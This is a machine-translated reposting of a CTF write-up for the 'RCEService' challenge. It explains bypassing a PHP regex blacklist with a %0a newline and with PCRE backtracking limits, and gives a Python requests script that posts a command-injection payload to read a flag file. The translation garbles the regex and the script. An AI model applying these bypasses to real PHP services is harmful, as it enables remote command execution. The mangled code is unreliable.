Shulou(Shulou.com)05/31 Report--

Today, I would like to share with you the relevant knowledge points about how to achieve RCEService regular backtracking in PHP. The content is detailed and the logic is clear. I believe most people still know too much about this knowledge, so share this article for your reference. I hope you can get something after reading this article. Let's learn about it.

After opening the title and entering the cmd of JSON type, I tried to read the source code of index.php, but I couldn't read it, and there was nothing in / index and / index/login that came out of the background. I really didn't know how to do it. I could only look at other people's wp and found that they had reviewed the source code since. I was surprised. How did the source code come from? I read a lot of wp and found that it should be the source code directly given during the game. But the buu platform forgot to add

Seeing the final system and the regular, it seems that this question is going to bypass the regular cmd command. So many blacklist functions should not let us find the fish out of the net, won't it?

We see that regular expressions do not add modifiers, so we can take advantage of multi-line matching.

Here we can use the% 0a newline character to bypass regular matching, and we can see that it takes a modifier s to match the newline character, so we can use our previous ls to see if it works.

It was found that the environment variable path was compiled in the index.php; source code (I thought it was just a hint of our directory), so let's take a look at that directory.

Found the flag file, I can not read it with nl,cat,more,less and other commands, check the data found that the system command requires a specific environment variable, that is, the path, the system can not find the path under the exe file how to execute the system command

So this place looks up the data and finds that you can only call the command under the absolute path, and the cat command is under the / bin/ directory.

The second way is that too much regular expression backtracking leads to false. To be honest, this is the first time I've heard of regular backtracking problems.

PHP uses PCRE backtracking restrictions to bypass certain security restrictions

To put it simply, when the regular expression matches, there is a certain. * all the following characters are matched, so there is no place for the formula after the expression to match, so one character is spit out until all the later expressions are matched or backtracked too many times.

Examples

After trying it myself, it can only be traced back a million times.

'/ ^. *

The first matching character of the regular expression, ^ represents the first letter,'.' It represents all the characters except the newline character, and * represents that the previous expression has been executed repeatedly many times, so he matches all of our payload directly here, resulting in fewer characters in the following match and can only be traced back one by one.

By matching the following characters, we can find that the lowercase letters currently written have not been filtered out, because the conversion of hexadecimal\ x00 -\ x1f to decimal does not reach the ascii value of lowercase letters. therefore, we can use a lowercase letter × a million times to make the regular expression fail directly.

Import requestsurl=' http://5dd96313-13f8-4eb6-89eb-0dbb5a4ba30a.node3.buuoj.cn'data={ 'cmd':' {"cmd": "/ bin/cat / home/rceservice/flag", "feng": "+' a regular backtracking of 1000000 million'}'} r=requests.post (url=url,data=data) .textprint (r) above is all the content of the article" how to implement regular backtracking in PHP ". Thank you for reading! I believe you will gain a lot after reading this article. The editor will update different knowledge for you every day. If you want to learn more knowledge, please pay attention to the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.